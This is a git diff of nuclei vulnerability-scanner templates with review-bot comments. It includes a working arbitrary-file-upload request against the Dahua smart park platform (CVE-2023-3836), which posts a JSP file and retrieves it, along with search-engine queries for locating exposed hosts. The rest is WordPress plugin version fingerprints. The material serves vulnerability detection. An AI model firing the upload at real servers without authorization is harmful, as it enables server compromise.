@@ -1,68 +1,50 @@ id: CVE-2023-3836 info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical + name: 大华-WPMS-upload-addimgico + author: hufei + severity: high description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E metadata: + max-request: 1 + fofa-query: app="大华-智慧园区综合管理平台" + hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} + User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 177 + 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary + --e00b34d08d13639f8b619829b04c1a29 + Content-Disposition: form-data; name="upload"; filename="test.jsp" + Content-Type: image/gif + + {{randstr}} + --e00b34d08d13639f8b619829b04c1a29-- - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + GET /upload/emap/society_new/{{name}} HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - extractors: - - type: regex - name: shell_filename + - type: json + name: name + json: + - ".data" internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: word + words: + - '{{randstr}}' \ No newline at end of file diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index fa3aafbfe2..c7afb0444b 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml 
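Review bot: The rewrite drops the `tags` line entirely (previously `cve,cve2023,dahua,fileupload,intrusive,rce`), so runs that exclude `intrusive` templates will now upload a JSP to production Dahua hosts, and `-tags cve` selection will miss a template whose `id` is still `CVE-2023-3836`; restore the tags. It also removes the `classification` block, the NVD/VulDB references and the `# digest` signature while lowering `severity` from `critical` to `high`, contradicting the 9.8 score that was just deleted — the CVE metadata should be kept even if the request body is changed. The matcher is now a bare `word` on `'{{randstr}}'` with no `part` and no `req-condition`, so it is evaluated against the upload response too, and `Content-Length: 177` is hardcoded against a variable-length `{{randstr}}` body; I would keep the previous two-request DSL and drop the header. The `.data` JSON path for the stored filename is unverified from here. The hunk starts on the previous line.

```yaml
  tags: cve,cve2023,dahua,fileupload,intrusive,rce
# … unchanged: raw requests (without the hardcoded Content-Length) and extractor …
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{randstr}}')"
        condition: and
```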
@@ -1,68 +1,50 @@ id: CVE-2023-3836 info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical + name: 大华-WPMS-upload-addimgico + author: hufei + severity: high description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E metadata: + max-request: 1 + fofa-query: app="大华-智慧园区综合管理平台" + hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} + User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 177 + 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary + --e00b34d08d13639f8b619829b04c1a29 + Content-Disposition: form-data; name="upload"; filename="test.jsp" + Content-Type: image/gif + + {{randstr}} + --e00b34d08d13639f8b619829b04c1a29-- - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + GET /upload/emap/society_new/{{name}} HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - extractors: - - type: regex - name: shell_filename + - type: json + name: name + json: + - ".data" internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: word + words: + - '{{randstr}}' \ No newline at end of file diff --git a/poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml b/poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml new file mode 100644 index 0000000000..10e9dd293d --- /dev/null +++ b/poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml 
@@ -0,0 +1,59 @@ +id: leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/35b1fb1a-a12c-4938-a2d2-74e291db76ef?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml b/poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml new file mode 100644 index 0000000000..ddf86b77af --- /dev/null +++ b/poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml 
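Review bot: `description`, `cvss-metrics`, `cvss-score` and `cve-id` are emitted as empty keys, yet `tags` starts with `cve` and `shodan-query: 'vuln:'` is an unfilled placeholder, so the template claims a CVE classification it does not carry; either fill the fields from the referenced Wordfence entry or drop the `cve` tag and the empty keys. The template is a version fingerprint only (it reads `Stable tag` from readme.txt and checks `compare_versions(version, '<= 2.0.36')`), so the description should say what a match means, e.g. `description: > Detects Leopard - WordPress offload media <= 2.0.36 from the Stable tag in readme.txt; it does not exercise the authorization flaw.`. The two `version` extractors are identical except for `internal: true`; if a named non-internal extractor is also visible to the DSL matcher (as it appears to be in recent nuclei), one extractor suffices, so confirm before collapsing them. A readme with `Stable tag: trunk` does not match the regex, which should leave `version` unset and the DSL matcher false; that is the safe direction but deserves a comment next to the regex. The same generated skeleton with the same empty fields recurs in every other new-file hunk of this commit (leopard-wordpress-offload-media-b3f7…, wp-analytify, the three wp-backitup files, wp-file-manager-pro, wp-job-portal, wp-jobsearch, wp-lister-for-ebay, both wp-product-feed-manager files, wp-travel-blocks, both wpforo files and wptelegram-widget).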
@@ -0,0 +1,59 @@ +id: leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml b/poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml new file mode 100644 index 0000000000..72252f4851 --- /dev/null +++ b/poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml 
@@ -0,0 +1,59 @@ +id: wp-analytify-690113e54f3bf0d5f9d38a1c0e496671 + +info: + name: > + Analytify <= 5.3.1 - Cross-Site Request Forgery to Opt-out + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e407409-989d-48f8-8135-6071015a6064?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-analytify/" + google-query: inurl:"/wp-content/plugins/wp-analytify/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-analytify,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-analytify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-analytify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.3.1') \ No newline at end of file diff --git a/poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml b/poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml new file mode 100644 index 0000000000..99b6135578 --- /dev/null +++ b/poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml 
@@ -0,0 +1,59 @@ +id: wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f35838f-4a7d-4d25-9e5e-956411e59b62?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-backitup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml b/poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml new file mode 100644 index 0000000000..750355b800 --- /dev/null +++ b/poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml 
@@ -0,0 +1,59 @@ +id: wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa15939c-44eb-45e5-95d7-49307912f21c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-backitup,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml b/poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml new file mode 100644 index 0000000000..5d9cefd989 --- /dev/null +++ b/poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml 
@@ -0,0 +1,59 @@ +id: wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61a050bd-deaa-4115-baa5-f63790816450?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-backitup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml b/poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml new file mode 100644 index 0000000000..24577ef5b4 --- /dev/null +++ b/poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml 
@@ -0,0 +1,59 @@ +id: wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f + +info: + name: > + File Manager Pro <= 8.3.7 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-file-manager-pro/" + google-query: inurl:"/wp-content/plugins/wp-file-manager-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-file-manager-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-file-manager-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-file-manager-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.3.7') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml b/poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml new file mode 100644 index 0000000000..cb848da5db --- /dev/null +++ b/poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml 
@@ -0,0 +1,59 @@ +id: wp-job-portal-86811d18d4d789d537deb1f6ba496b4c + +info: + name: > + WP Job Portal <= 2.1.6 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/630e4595-4be3-4886-8771-f781bcee674d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.6') \ No newline at end of file diff --git a/poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml b/poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml new file mode 100644 index 0000000000..d29acfc8d2 --- /dev/null +++ b/poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml 
@@ -0,0 +1,59 @@ +id: wp-jobsearch-03c799c8c1a4335310c615dc29112568 + +info: + name: > + JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-jobsearch,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml b/poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml new file mode 100644 index 0000000000..396dfc34bc --- /dev/null +++ b/poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml 
@@ -0,0 +1,59 @@ +id: wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871 + +info: + name: > + WP-Lister Lite for eBay <= 3.6.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76ded81-4c78-4054-9a26-7e215285a2b6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-lister-for-ebay/" + google-query: inurl:"/wp-content/plugins/wp-lister-for-ebay/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-lister-for-ebay,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-lister-for-ebay/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-lister-for-ebay" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml b/poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml new file mode 100644 index 0000000000..4517a6a672 --- /dev/null +++ b/poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml 
@@ -0,0 +1,59 @@ +id: wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55 + +info: + name: > + WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-product-feed-manager/" + google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-product-feed-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.0') \ No newline at end of file diff --git a/poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml b/poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml new file mode 100644 index 0000000000..eb1bff88e7 --- /dev/null +++ b/poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml 
@@ -0,0 +1,59 @@ +id: wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5 + +info: + name: > + WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-product-feed-manager/" + google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-product-feed-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.0') \ No newline at end of file diff --git a/poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml b/poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml new file mode 100644 index 0000000000..46ffd1779c --- /dev/null +++ b/poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml 
@@ -0,0 +1,59 @@ +id: wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af + +info: + name: > + WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-travel-blocks/" + google-query: inurl:"/wp-content/plugins/wp-travel-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-travel-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-travel-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml b/poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml new file mode 100644 index 